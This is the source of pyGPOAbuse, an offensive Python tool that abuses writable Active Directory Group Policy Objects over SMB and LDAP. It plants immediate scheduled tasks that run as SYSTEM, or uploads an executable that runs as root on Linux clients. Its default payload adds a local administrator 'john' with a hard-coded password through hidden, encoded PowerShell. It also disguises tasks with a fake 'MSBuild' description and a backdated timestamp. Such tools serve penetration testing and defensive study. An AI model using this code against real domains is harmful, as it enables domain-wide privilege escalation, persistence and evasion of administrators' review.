import logging
import asyncio

from msldap.commons.factory import LDAPConnectionFactory
from msldap.ldap_objects import MSADGPO


async def find_gpo_id_by_name(url, domain, name):
    """Return the raw GUID (without braces) of the GPO whose displayName matches *name*, or None."""
    conn_url = LDAPConnectionFactory.from_url(url)
    ldap_client = conn_url.get_client()
    _, err = await ldap_client.connect()
    if err is not None:
        logging.debug(f"LDAP connection failed during GPO name resolution: {err}")
        return None
    async for gpo, err in ldap_client.get_all_gpos():
        if err is not None:
            logging.debug(f"Error fetching GPOs: {err}")
            return None
        if gpo is None:
            continue
        if getattr(gpo, 'displayName', None) == name:
            cn = getattr(gpo, 'cn', None)
            if cn:
                return cn.strip('{}')
    return None


class Ldap:
    def __init__(self, url, gpo_id, domain):
        self.domain_dn = ",".join("DC={}".format(d) for d in domain.split("."))
        self.dn = f'CN={{{gpo_id}}},CN=Policies,CN=System,{self.domain_dn}'
        conn_url = LDAPConnectionFactory.from_url(url)
        self.ldap_client = conn_url.get_client()

    async def connect(self):
        _, err = await self.ldap_client.connect()
        if err is not None:
            logging.error("LDAP connection failed")
            return False
        return True

    async def get_attribute(self, attribute):
        async for gpo, err in self.ldap_client.get_object_by_dn(self.dn, expected_class=MSADGPO):
            if err is not None:
                logging.debug(f"Error fetching {attribute}: {err}")
                return False
            try:
                return getattr(gpo, attribute)
            except AttributeError:
                return False
        return False

    async def update_attribute(self, attribute, value, old_value=None):
        if old_value is None:
            action = 'add'
        else:
            action = 'replace'
        _, err = await self.ldap_client.modify(self.dn, {
            attribute: [(action, value)]
        })
        if err is not None:
            logging.debug("Error while updating {}".format(attribute))
            logging.debug(err)



import asyncio
import logging
import re
from pygpoabuse.scheduledtask import ScheduledTask
from pygpoabuse.ldap import Ldap
from impacket.smbconnection import SessionError


class GPO:
    def __init__(self, smb_session):
        self._smb_session = smb_session

    def update_extensionNames(self, extensionName):
        val1 = "00000000-0000-0000-0000-000000000000"
        val2 = "CAB54552-DEEA-4691-817E-ED4A4D1AFC72"
        val3 = "AADCED64-746C-4633-A97C-D61349046527"

        if isinstance(extensionName, list):
            extensionName = ''.join(extensionName)

        if not extensionName:
            return "[{" + val1 + "}{" + val2 + "}][{" + val3 + "}{" + val2 + "}]"

        brackets = {}
        for m in re.finditer(r'\[([^\]]+)\]', extensionName):
            guids = re.findall(r'\{([^}]+)\}', m.group(1))
            if guids:
                brackets[guids[0]] = guids[1:]

        for leader in (val1, val3):
            brackets.setdefault(leader, [])
            if val2 not in brackets[leader]:
                brackets[leader].append(val2)

        result = ""
        for leader in sorted(brackets):
            result += "[{" + leader + "}" + "".join("{" + g + "}" for g in brackets[leader]) + "]"
        return result

    async def update_ldap(self, url, domain, gpo_id, gpo_type="computer"):
        ldap = Ldap(url, gpo_id, domain)
        r = await ldap.connect()
        if not r:
            logging.debug("Could not connect to LDAP")
            return False

        version = await ldap.get_attribute("versionNumber") or 0

        if gpo_type == "computer":
            attribute_name = "gPCMachineExtensionNames"
            updated_version = version + 1
        else:
            attribute_name = "gPCUserExtensionNames"
            updated_version = version + 65536

        extensionName = await ldap.get_attribute(attribute_name)

        if extensionName is False:
            logging.debug("Could not get {} attribute".format(attribute_name))
            return False

        updated_extensionName = self.update_extensionNames(extensionName)

        logging.debug("New extensionName: {}".format(updated_extensionName))

        await ldap.update_attribute(attribute_name, updated_extensionName, extensionName)
        await ldap.update_attribute("versionNumber", updated_version, version)

        return updated_version

    def update_versions(self, url, domain, gpo_id, gpo_type):
        updated_version = asyncio.run(self.update_ldap(url, domain, gpo_id, gpo_type))

        if not updated_version:
            return False

        logging.debug("Updated version number : {}".format(updated_version))

        try:
            tid = self._smb_session.connectTree("SYSVOL")
            fid = self._smb_session.openFile(tid, domain + "/Policies/{" + gpo_id + "}/gpt.ini")
            content = self._smb_session.readFile(tid, fid)
             # Added by @Deft_ to comply with french active directories (mostly accents)
            try:
                new_content = re.sub('=[0-9]+', '={}'.format(updated_version), content.decode("utf-8"))
            except UnicodeDecodeError:
                new_content = re.sub('=[0-9]+', '={}'.format(updated_version), content.decode("latin-1"))
            self._smb_session.writeFile(tid, fid, new_content)
            self._smb_session.closeFile(tid, fid)
        except Exception:
            logging.error("Unable to update gpt.ini file", exc_info=True)
            return False

        logging.debug("gpt.ini file successfully updated")
        return True

    def _check_or_create(self, base_path, path):
        for dir in path.split("/"):
            base_path += dir + "/"
            try:
                self._smb_session.listPath("SYSVOL", base_path)
                logging.debug("{} exists".format(base_path))
            except Exception:
                try:
                    self._smb_session.createDirectory("SYSVOL", base_path)
                    logging.debug("{} created".format(base_path))
                except Exception:
                    logging.error("This user doesn't seem to have the necessary rights", exc_info=True)
                    return False
        return True
    ## Added Filter support
    def update_scheduled_task(self, domain, gpo_id, name="", mod_date="", description="", powershell=False, command="", gpo_type="computer", force=False, filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):

        try:
            tid = self._smb_session.connectTree("SYSVOL")
            logging.debug("Connected to SYSVOL")
        except Exception:
            logging.error("Unable to connect to SYSVOL share", exc_info=True)
            return False

        path = domain + "/Policies/{" + gpo_id + "}/"

        try:
            self._smb_session.listPath("SYSVOL", path)
            logging.debug("GPO id {} exists".format(gpo_id))
        except Exception:
            logging.error("GPO id {} does not exist".format(gpo_id), exc_info=True)
            return False

        root_path = "Machine" if gpo_type == "computer" else "User"

        if not self._check_or_create(path, "{}/Preferences/ScheduledTasks".format(root_path)):
            return False

        path += "{}/Preferences/ScheduledTasks/ScheduledTasks.xml".format(root_path)

        fid = None
        try:
            fid = self._smb_session.openFile(tid, path)
            st_content = self._smb_session.readFile(tid, fid, singleCall=False).decode("utf-8")
            st = ScheduledTask(gpo_type=gpo_type, name=name, mod_date=mod_date, description=description,
                               powershell=powershell, command=command, old_value=st_content, filter_enabled=filter_enabled,target_dns_name=target_dns_name,target_username=target_username, target_user_sid=target_user_sid)
            tasks = st.parse_tasks(st_content)

            if not force:
                self._smb_session.closeFile(tid, fid)
                fid = None
                logging.error("The GPO already includes a ScheduledTasks.xml.")
                logging.error("Use -f to append to ScheduledTasks.xml")
                logging.error("Use -v to display existing tasks")
                logging.warning("C: Create, U: Update, D: Delete, R: Replace")
                for task in tasks:
                    logging.warning("[{}] {} (Type: {})".format(task[0], task[1], task[2]))
                return False

            new_content = st.generate_scheduled_task_xml()
        except Exception:
            # File does not exist — close any stale handle before creating
            if fid is not None:
                try:
                    self._smb_session.closeFile(tid, fid)
                except Exception:
                    pass
                fid = None
            logging.debug("ScheduledTasks.xml does not exist. Creating it...")
            try:
                fid = self._smb_session.createFile(tid, path)
                logging.debug("ScheduledTasks.xml created")
            except Exception:
                logging.error("This user doesn't seem to have the necessary rights", exc_info=True)
                return False
            st = ScheduledTask(gpo_type=gpo_type, name=name, mod_date=mod_date, description=description, powershell=powershell, command=command, filter_enabled=filter_enabled,target_dns_name=target_dns_name,target_username=target_username, target_user_sid=target_user_sid)
            new_content = st.generate_scheduled_task_xml()

        try:
            self._smb_session.writeFile(tid, fid, new_content)
            logging.debug("ScheduledTasks.xml has been saved")
        except Exception:
            logging.error("This user doesn't seem to have the necessary rights", exc_info=True)
            self._smb_session.closeFile(tid, fid)
            return False
        self._smb_session.closeFile(tid, fid)
        return st.get_name()

    def rollback_scheduled_task(self, domain, gpo_id, gpo_type="computer"):
        """
        Delete ScheduledTasks.xml.
        """

        share = "SYSVOL"
        root = "Machine" if gpo_type == "computer" else "User"
        base = f"{domain}/Policies/{{{gpo_id}}}"
        xml = f"{base}/{root}/Preferences/ScheduledTasks/ScheduledTasks.xml"

        # remove the XML
        try:
            self._smb_session.deleteFile(share, xml)
            logging.info(f"Deleted {xml}")
        except SessionError as e:
            logging.error(f"XML delete failed: {e}")
            return False

        return True



import logging
import sys


class GpoFormatter(logging.Formatter):
    # Custom formatting. Inspired by impacket "Logger" class

    def __init__(self):
        logging.Formatter.__init__(self, '%(bullet)s %(message)s', None)

    def format(self, record):
        # Custom bullet formatting with colors
        if record.levelno == logging.INFO:
            record.bullet = '\033[1;34m[*]\033[0m'
        elif record.levelno == logging.DEBUG:
            record.bullet = '\033[1;37m[*]\033[0m'
        elif record.levelno == logging.WARNING:
            record.bullet = '\033[1;33m[!]\033[0m'
        elif record.levelno == logging.ERROR:
            record.bullet = '\033[1;31m[x]\033[0m'
        else:
            record.bullet = '\033[1;32m[+]\033[0m'

        # Only log stacktrace when log level is DEBUG
        if record.exc_info and logging.getLogger().getEffectiveLevel() != logging.DEBUG:
            record.exc_info = None

        return logging.Formatter.format(self, record)


def init():
    # We add a StreamHandler and formatter to the root logger
    handler = logging.StreamHandler(sys.stdout)
    handler.setFormatter(GpoFormatter())
    logging.getLogger().addHandler(handler)
    logging.getLogger().setLevel(logging.INFO)
    logging.addLevelName(25, 'SUCCESS')
    setattr(logging, 'success', lambda message, *args: logging.getLogger()._log(25, message, args))


import binascii
import logging
import os
import re
import uuid
from base64 import b64encode
from datetime import datetime, timedelta
from xml.sax.saxutils import escape, quoteattr
import xml.etree.ElementTree as ET



class ScheduledTask:
    def __init__(self, gpo_type="computer", name="", mod_date="", description="", powershell=False, command="", old_value="", filter_enabled=False, target_dns_name="", target_username="", target_user_sid=""):
        self._type = gpo_type

        if name:
            self._name = escape(name, {'"': '&quot;'})
        else:
            self._name = "TASK_" + binascii.b2a_hex(os.urandom(4)).decode('ascii')

        if mod_date:
            self._mod_date = mod_date
        else:
            mod_date = datetime.now() - timedelta(days=30)
            self._mod_date = mod_date.strftime("%Y-%m-%d %H:%M:%S")
        self._guid = str(uuid.uuid4()).upper()
        self._author = "NT AUTHORITY\\System"
        if description:
            self._description = escape(description)
        else:
            self._description = "MSBuild build and release task"

        if powershell:
            self._shell = escape("powershell.exe")
            if command:
                self._command = escape('-windowstyle hidden -nop -enc {}'.format(b64encode(command.encode('UTF-16LE')).decode("utf-8")))
            else:
                self._command = escape('-windowstyle hidden -nop -enc {}'.format(b64encode('net user john H4x00r123.. /add;net localgroup administrators john /add'.encode('UTF-16LE')).decode('utf-8')))
        else:
            self._shell = escape('c:\\windows\\system32\\cmd.exe')
            if command:
                self._command = escape('/c "{}"'.format(command))
            else:
                self._command = escape('/c "net user john H4x00r123.. /add && net localgroup administrators john /add"')

        logging.debug(self._shell + " " + self._command)
        self._old_value = old_value

        self._task_str_begin = f"""<?xml version="1.0" encoding="utf-8"?><ScheduledTasks clsid="{{CC63F200-7309-4ba0-B154-A71CD118DBCC}}">"""
        if self._type == "computer":
            self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}" userContext="0" removePolicy="0"><Properties action="C" name="{self._name}" runAs="NT AUTHORITY\\System" logonType="S4U"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITY\\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>false</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><AllowStartOnDemand>false</AllowStartOnDemand><Enabled>true</Enabled><Hidden>true</Hidden><ExecutionTimeLimit>PT0S</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter><RestartOnFailure><Interval>PT15M</Interval><Count>3</Count></RestartOnFailure></Settings><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers></Task></Properties></ImmediateTaskV2>"""
        elif self._type == "user-as-admin":
            self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="NT AUTHORITY\\System" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>NT AUTHORITY\\System</UserId><LogonType>S4U</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
        else:
            self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""

        # Targeting single hosts/users through filtering 
        # host (computer GPO) or principal (user GPO) instead of every object in the GPO scope
        # XML mirrors SharpGPOAbuse --FilterEnabled output.
        self._filters = ""
        if filter_enabled:
            if self._type == "computer":
                if target_dns_name:
                    _dns = escape(target_dns_name, {'"': '&quot;'})
                    self._filters = '<Filters><FilterComputer bool="AND" not="0" type="DNS" name="{}"/></Filters>'.format(_dns)
            else:
                if target_username or target_user_sid:
                    _fu = '<FilterUser bool="AND" not="0"'
                    if target_username:
                        _fu += ' name="{}"'.format(escape(target_username, {'"': '&quot;'}))
                    if target_user_sid:
                        _fu += ' sid="{}"'.format(escape(target_user_sid, {'"': '&quot;'}))
                    _fu += '/>'
                    self._filters = '<Filters>{}</Filters>'.format(_fu)

        if self._filters:
            self._task_str = self._task_str.replace(
                "</Properties></ImmediateTaskV2>",
                "</Properties>" + self._filters + "</ImmediateTaskV2>"
            )

        self._task_str_end = f"""</ScheduledTasks>"""

    def generate_scheduled_task_xml(self):
        if self._old_value == "":
            return self._task_str_begin + self._task_str + self._task_str_end

        return re.sub(r"< */ *ScheduledTasks>", self._task_str.replace("\\", "\\\\") + self._task_str_end, self._old_value)

    def get_name(self):
        return self._name

    def parse_tasks(self, xml_tasks):
        elem = ET.fromstring(xml_tasks)
        tasks = []
        for child in elem.findall("*"):
            task_type = child.tag
            task_properties = child.find("Properties")
            if task_properties is None:
                tasks.append(["?", "<unknown>", task_type or "<unknown>"])
                continue
            action = task_properties.get('action')
            name = task_properties.get('name')
            tasks.append([
                action if action is not None else "?",
                name if name is not None else "<unknown>",
                task_type if task_type is not None else "<unknown>"
            ])
        return tasks



#!/usr/bin/env python3

"""
This tool is a partial python implementation of SharpGPOAbuse
https://github.com/FSecureLABS/SharpGPOAbuse
All credit goes to @pkb1s for his research, especially regarding gPCMachineExtensionNames

Also thanks to @airman604 for schtask_now.py that was used and modified in this project
https://github.com/airman604/schtask_now
"""

import argparse
import asyncio
import logging
import sys
from urllib.parse import quote

from impacket.smbconnection import SMBConnection
from impacket.examples.utils import parse_credentials

from pygpoabuse import logger
from pygpoabuse.gpo import GPO
from pygpoabuse.ldap import find_gpo_id_by_name
from pygpoabuse.linux_startup import LinuxStartupAbuse


def main():
    parser = argparse.ArgumentParser(add_help=True, description="Add ScheduledTask to GPO")

    parser.add_argument('target', action='store', help='domain/username[:password]')

    gpo_group = parser.add_mutually_exclusive_group(required=True)
    gpo_group.add_argument('-gpo-id', action='store', metavar='GPO_ID',
                           help='Target GPO by its GUID (e.g. 31B2F340-016D-11D2-945F-00C04FB984F9)')
    gpo_group.add_argument('-gpo-name', action='store', metavar='GPO_NAME',
                           help='Target GPO by its display name (resolved via LDAP)')

    parser.add_argument('-user', action='store_true', help='Set user GPO (Default: False, Computer GPO)')
    parser.add_argument('-user-as-admin', action='store_true', help='Set user GPO but run as SYSTEM (Default: False, Computer GPO)')
    parser.add_argument('-taskname', action='store', help='Taskname to create. (Default: TASK_<random>)')
    parser.add_argument('-mod-date', action='store', help='Task modification date (Default: 30 days before)')
    parser.add_argument('-hashes', action="store", metavar="LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
    parser.add_argument('-description', action='store', help='Task description (Default: Empty)')
    parser.add_argument('--cleanup', action='store_true', help='Delete the Immediate-Task XML and roll back the GPO version')
    parser.add_argument('-powershell', action='store_true', help='Use Powershell for command execution')
    parser.add_argument('-command', action='store',
                        help='Command to execute (Default: Add john:H4x00r123.. as local Administrator)')
    parser.add_argument('-k', action='store_true', help='Use Kerberos authentication. Grabs credentials from ccache file '
                                            '(KRB5CCNAME) based on target parameters. If valid credentials '
                                            'cannot be found, it will use the ones specified in the command '
                                            'line')
    parser.add_argument('-dc-ip', action='store', help='Domain controller IP or hostname')
    parser.add_argument('-ldaps', action='store_true', help='Use LDAPS instead of LDAP')
    parser.add_argument('-ccache', action='store', help='ccache file name (must be in local directory)')
    parser.add_argument('-f', action='store_true', help='Force add ScheduleTask')
    parser.add_argument('-v', action='count', default=0, help='Verbosity level (-v or -vv)')
    filtered = parser.add_argument_group("Host/User targeting via filters (mirrors SharpGPOAbuse --FilterEnabled)")
    filtered.add_argument('-filter-enabled', action='store_true',
                           help='Enable GPO Host/User targeting so the scheduled task only runs for a specific host/user')
    filtered.add_argument('-target-dns-name', action='store', default='', metavar='FQDN',
                           help='Computer task: DNS/FQDN of the only host that should run the task (e.g. dc01.corp.local)')
    filtered.add_argument('-target-username', action='store', default='', metavar='DOMAIN\\USER',
                           help='User task: only this user processes the task (format: DOMAIN\\username)')
    filtered.add_argument('-target-user-sid', action='store', default='', metavar='SID',
                           help='User task: SID of the targeted user (optional, more robust matching)')

    linux = parser.add_argument_group("Linux (Samba AD) options")
    linux.add_argument("--linux-exec", metavar="/PATH/TO/EXEC",
                       help="Upload this executable into the GPO and run it at boot on Linux clients (no shell).")
    linux.add_argument("--linux-args", default="", help="Arguments for the executable.")
    linux.add_argument("--linux-run-as", default="root", help="User to run as (default: root).")

    if len(sys.argv) == 1:
        parser.print_help()
        sys.exit(1)

    options = parser.parse_args()

    # Init the example's logger theme
    logger.init()

    if options.v == 1:
        logging.getLogger().setLevel(logging.INFO)
    elif options.v >= 2:
        logging.getLogger().setLevel(logging.DEBUG)
    else:
        logging.getLogger().setLevel(25)  # SUCCESS level: show successes, warnings and errors
    _is_user_task = options.user or options.user_as_admin
    if options.filter_enabled:
        if _is_user_task:
            if not (options.target_username or options.target_user_sid):
                logging.error("-filter-enabled on a user task requires -target-username and/or -target-user-sid")
                sys.exit(1)
        else:
            if not options.target_dns_name:
                logging.error("-filter-enabled on a computer task requires -target-dns-name")
                sys.exit(1)
    elif options.target_dns_name or options.target_username or options.target_user_sid:
        logging.warning("Targeting option supplied without -filter-enabled; item-level targeting will NOT be applied")

    domain, username, password = parse_credentials(options.target)

    if options.dc_ip:
        dc_ip = options.dc_ip
    else:
        dc_ip = domain

    if domain == '':
        logging.critical('Domain should be specified!')
        sys.exit(1)

    lmhash, nthash = "", ""

    if password == '' and username != '' and options.hashes is None and options.k is False:
        from getpass import getpass
        password = getpass("Password:")
    elif options.hashes is not None:
        if ":" not in options.hashes:
            logging.error("Wrong hash format. Expecting lm:nt")
            sys.exit(1)

    if options.ldaps:
        protocol = 'ldaps'
    else:
        protocol = 'ldap'

    if options.k:
        if not options.ccache:
            logging.error('-ccache required (path of ccache file, must be in local directory)')
            sys.exit(1)
        url = '{}+kerberos-ccache://{}\\{}:{}@{}/?dc={}'.format(protocol, domain, username, quote(options.ccache, safe="".join(c for c in map(chr, range(33, 127)) if c not in '@#?/')), dc_ip, dc_ip)
    elif password != '':
        url = '{}+ntlm-password://{}\\{}:{}@{}'.format(protocol, domain, username, quote(password, safe="".join(c for c in map(chr, range(33, 127)) if c not in '@#?/')), dc_ip)
        lmhash, nthash = "", ""
    else:
        url = '{}+ntlm-nt://{}\\{}:{}@{}'.format(protocol, domain, username, quote(options.hashes.split(":")[1], safe="".join(c for c in map(chr, range(33, 127)) if c not in '@#?/')), dc_ip)
        lmhash, nthash = options.hashes.split(":")

    if options.gpo_name:
        logging.info(f"Resolving GPO name '{options.gpo_name}' via LDAP...")
        gpo_id = asyncio.run(find_gpo_id_by_name(url, domain, options.gpo_name))
        if not gpo_id:
            logging.error(f"Could not find a GPO named '{options.gpo_name}'")
            sys.exit(1)
        logging.info(f"Resolved '{options.gpo_name}' → {gpo_id}")
        options.gpo_id = gpo_id

    try:
        smb_session = SMBConnection(dc_ip, dc_ip)
        if options.k:
            smb_session.kerberosLogin(user=username, password='', domain=domain, kdcHost=dc_ip)
        else:
            smb_session.login(username, password, domain, lmhash, nthash)
    except Exception as e:
        logging.error("SMB connection error", exc_info=True)
        sys.exit(1)

    try:
        gpo = GPO(smb_session)

        gpo_type = "user-as-admin" if options.user_as_admin else ("user" if options.user else "computer")

        if options.linux_exec:
            method = LinuxStartupAbuse(
                smb_session=smb_session,
                domain_fqdn=domain,
                gpo_guid=options.gpo_id,
                exec_local_path=options.linux_exec,
                exec_args=options.linux_args,
                run_as=options.linux_run_as,
                run_once=True
            )
            method.run(cleanup=options.cleanup)

            try:
                files = smb_session.listPath("SYSVOL", method._startup_dir + "\\*")
                if any(f.get_longname() == method.script_name for f in files):
                    print("[+] SUCCESS:root:executable '{}' created in {}".format(
                        method.script_name, method._startup_dir))
                else:
                    logging.error("Upload failed: '{}' not found in {}".format(
                        method.script_name, method._startup_dir))
            except Exception as e:
                logging.error("Could not verify creation: {}".format(e))

            sys.exit(0)

        if options.cleanup:
            ok = gpo.rollback_scheduled_task(domain=domain, gpo_id=options.gpo_id, gpo_type=gpo_type)
            if ok:
                logging.info("cleanup successful")
                sys.exit(0)
            else:
                logging.error("Error while cleaning up")
                sys.exit(1)

        task_name = gpo.update_scheduled_task(
            domain=domain,
            gpo_id=options.gpo_id,
            name=options.taskname,
            mod_date=options.mod_date,
            description=options.description,
            powershell=options.powershell,
            command=options.command,
            gpo_type=gpo_type,
            force=options.f,
            filter_enabled=options.filter_enabled,
            target_dns_name=options.target_dns_name,
            target_username=options.target_username,
            target_user_sid=options.target_user_sid
        )
        if task_name:
            if gpo.update_versions(url, domain, options.gpo_id, gpo_type=gpo_type):
                logging.info("Version updated")
            else:
                logging.error("Error while updating versions")
                sys.exit(1)
            logging.success("ScheduledTask {} created!".format(task_name))
    except Exception as e:
        logging.error("An error occurred. Use -vv for more details", exc_info=True)



# pygpoabuse/linux_startup.py
import io
import ntpath
import hashlib
import re

MANIFEST_REL = r"MACHINE\VGP\VTLA\Unix\Scripts\Startup\manifest.xml"
STARTUP_DIR_REL = r"MACHINE\VGP\VTLA\Unix\Scripts\Startup"

def _md5_upper(b: bytes) -> str:
    return hashlib.md5(b).hexdigest().upper()

class LinuxStartupAbuse:

    def __init__(self, smb_session, domain_fqdn, gpo_guid,
                 exec_local_path, exec_args="", run_as="root", run_once=True):
        self.conn = smb_session
        self.share = "SYSVOL"
        self.domain_fqdn = domain_fqdn
        if not (gpo_guid.startswith("{") and gpo_guid.endswith("}")):
            gpo_guid = "{" + gpo_guid.strip("{}") + "}"
        self.gpo_guid = gpo_guid
        self.exec_local_path = exec_local_path
        self.exec_args = exec_args or ""
        self.run_as = run_as or "root"
        self.run_once = run_once
        self.script_name = ntpath.basename(exec_local_path)

    @property
    def _pol_base(self) -> str:
        return rf"{self.domain_fqdn}\Policies\{self.gpo_guid}"

    @property
    def _startup_dir(self) -> str:
        return ntpath.join(self._pol_base, STARTUP_DIR_REL)

    @property
    def _manifest_path(self) -> str:
        return ntpath.join(self._pol_base, MANIFEST_REL)

    @property
    def _gpt_ini_path(self) -> str:
        return ntpath.join(self._pol_base, r"gpt.ini")

    def _mkdir_p(self, dpath: str):
        parts = dpath.strip("\\").split("\\")
        cur = ""
        for p in parts:
            cur = (cur + "\\" + p) if cur else p
            try:
                self.conn.createDirectory(self.share, cur)
            except Exception:
                pass

    def _read_small(self, rpath: str) -> bytes:
        bio = io.BytesIO()
        try:
            self.conn.getFile(self.share, rpath, bio.write)
            return bio.getvalue()
        except Exception:
            return b""

    def _write_all(self, rpath: str, data: bytes):
        bio = io.BytesIO(data)
        self.conn.putFile(self.share, rpath, bio.read)

    def _build_manifest(self, payload_bytes: bytes) -> bytes:
        h = _md5_upper(payload_bytes)
        lines = [
            "<?xml version='1.0' encoding='UTF-8'?>",
            "<vgppolicy>",
            "  <policysetting>",
            "    <version>1</version>",
            "    <name>Unix Scripts</name>",
            "    <description>Represents Unix scripts to run on Group Policy clients</description>",
            "    <data>",
            "      <listelement>",
            f"        <script>{self.script_name}</script>",
        ]
        if self.exec_args:
            lines.append(f"        <parameters>{self.exec_args}</parameters>")
        lines.append(f"        <hash>{h}</hash>")
        if self.run_as:
            lines.append(f"        <run_as>{self.run_as}</run_as>")
        if self.run_once:
            lines.append("        <run_once />")
        lines += [
            "      </listelement>",
            "    </data>",
            "  </policysetting>",
            "</vgppolicy>",
            ""
        ]
        return ("\n".join(lines)).encode("utf-8")

    def _bump_gpt_ini(self):
        cur = self._read_small(self._gpt_ini_path).decode("utf-8", "ignore")
        version = 0
        for line in cur.splitlines():
            if line.strip().lower().startswith("version="):
                try:
                    version = int(line.split("=", 1)[1].strip())
                except Exception:
                    pass
        new_version = version + 1
        if cur:
            # Update only the Version= line in place, preserving the rest of the file
            new, count = re.subn(r'(?im)^(Version=)\d+', f'Version={new_version}', cur)
            if count == 0:
                new = cur.rstrip('\n') + f'\nVersion={new_version}\n'
        else:
            new = f'[General]\nVersion={new_version}\n'
        self._write_all(self._gpt_ini_path, new.encode("utf-8"))

    def run(self, cleanup: bool = False):
        self._mkdir_p(self._startup_dir)

        if cleanup:
            try:
                self.conn.deleteFile(self.share, ntpath.join(self._startup_dir, self.script_name))
            except Exception:
                pass
            try:
                self.conn.deleteFile(self.share, self._manifest_path)
            except Exception:
                pass
            self._bump_gpt_ini()
            return

        with open(self.exec_local_path, "rb") as f:
            payload = f.read()
        self._write_all(ntpath.join(self._startup_dir, self.script_name), payload)

        self._write_all(self._manifest_path, self._build_manifest(payload))

        self._bump_gpt_ini()
